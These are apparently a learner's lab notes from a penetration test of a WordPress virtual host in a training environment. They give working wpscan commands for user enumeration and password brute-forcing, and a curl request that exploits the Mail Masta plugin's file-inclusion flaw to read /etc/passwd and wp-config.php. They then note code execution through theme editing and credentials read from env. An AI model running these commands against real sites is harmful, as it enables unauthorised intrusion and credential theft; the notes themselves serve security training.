## `ir.inlanefreight.local`
### enum
- this is a wordpress page ![[images/Pasted image 20260628152303.png]]
- `/wp-admin` ![[images/Pasted image 20260628152353.png]]
- `admin:admin` doesnt work
- forgot password could work with imap/pop3 ![[images/Pasted image 20260628152503.png]]
### `wpscan`
- run `wpscan` enum with output file and aggressive detection mode
```bash
sudo wpscan --url ir.inlanefreight.local -e -o ir.wpscan -v --detection-mode aggressive
```
- running version 6.0 ![[images/Pasted image 20260628200730.png]]
- several users found ![[images/Pasted image 20260628200748.png]]
- try brute force
- we got a hit for `ilfreightwp`
```bash
sudo wpscan --url ir.inlanefreight.local -e u --passwords /usr/share/seclists/Passwords/Leaked-Databases/rockyou-50.txt
```
## access dashboard as `ilfreightwp`
- we are in as an administrator ![[images/Pasted image 20260628212725.png]]
- plugins ![[images/Pasted image 20260628212526.png]]
- mail masta ver 1.0 is susceptible to:
- CVE-2016-10956 - LFI
- grab `wp-config.php`
- CVE-2017-6095, CVE-2017-6097, CVE-2017-6572 - SQLi
- themes ![[images/Pasted image 20260628212606.png]]
- users ![[images/Pasted image 20260628212544.png]]
### `mail-masta` LFI
- try to `curl [..] /etc/passwd`
- only `root` has a login shell?
```bash
curl -s http://ir.inlanefreight.local/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd
```
![[images/Pasted image 20260629204822.png]]
- try to curl apache logs ![[images/Pasted image 20260629205317.png]]
- try to curl `wp-config.php` ![[images/Pasted image 20260629210326.png]]
### edit themes
- edit inactive twenty-twenty theme ![[images/Pasted image 20260629210049.png]]
- we have RCE as `www-data` ![[images/Pasted image 20260629210143.png]]
- another flag ![[images/Pasted image 20260629210224.png]]
- confirmed that the vhost uis running in a docker container ![[images/Pasted image 20260629212828.png]]
- `env` > password for wordpress_db ![[images/Pasted image 20260629212748.png]]